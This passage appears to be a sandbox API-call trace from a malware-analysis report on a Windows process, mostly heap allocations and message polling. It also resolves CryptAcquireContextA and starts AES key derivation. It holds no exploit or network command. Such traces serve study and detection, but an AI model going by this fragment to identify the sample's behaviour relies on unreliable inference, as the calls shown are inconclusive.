returned 1 [0189.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0189.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0189.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0189.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0189.859] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0189.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0189.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0189.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0189.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0189.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0189.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0189.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0189.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0189.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0189.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0189.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0189.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0189.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0189.859] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0189.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0189.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0189.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0189.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0189.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0189.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0189.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0189.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0189.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0189.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0189.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0189.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0189.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0189.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0189.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0189.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0189.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0189.860] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0189.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0189.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0189.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0189.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0189.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0189.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0189.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0189.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0189.861] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0189.861] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0189.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0189.861] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0189.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0189.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0189.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0189.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0189.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0189.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0189.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0189.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0189.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0189.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0189.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0189.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0189.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0189.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0189.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0189.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0189.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0189.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0189.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0189.862] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0189.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0189.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0189.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0189.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0189.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0189.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0189.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0189.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0189.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0189.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0189.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0189.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0189.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0189.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0189.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0189.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0189.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0189.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0189.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0189.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0189.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0189.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0189.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0189.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0189.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0189.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69c08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0189.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0189.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0189.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0189.864] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0189.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0189.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0189.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0189.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0189.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0189.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0189.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0189.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69988 [0189.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69988, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0189.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0189.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0189.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0189.864] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0189.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0189.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0189.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0189.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0189.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0189.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0189.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0189.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0189.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0189.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0189.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0189.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0189.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0189.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0189.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0189.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0189.865] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0189.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0189.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0189.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0189.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0189.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0189.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0189.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0189.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0189.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0189.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0189.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0189.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0189.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0189.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0189.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0189.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0189.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0189.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0189.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0189.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0189.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0189.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0189.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0189.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0189.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0189.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0189.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0189.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0189.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0189.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0189.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0189.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0189.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0189.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0189.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0189.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0189.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0189.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0189.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0189.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0189.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0189.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0189.869] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0189.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0189.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0189.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0189.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0189.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0189.869] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0189.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0189.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0189.869] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0189.869] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0189.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0189.869] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0189.869] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0189.869] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0189.869] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0189.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd88 [0189.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0189.869] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0189.870] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0189.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0189.870] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0189.870] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0189.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0189.870] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0189.870] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0189.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0189.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0189.870] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0189.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0189.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0189.870] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0189.870] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0189.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0189.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0189.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0189.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0189.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0189.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0189.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0189.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0189.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0189.871] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0189.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0189.871] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0189.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0189.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 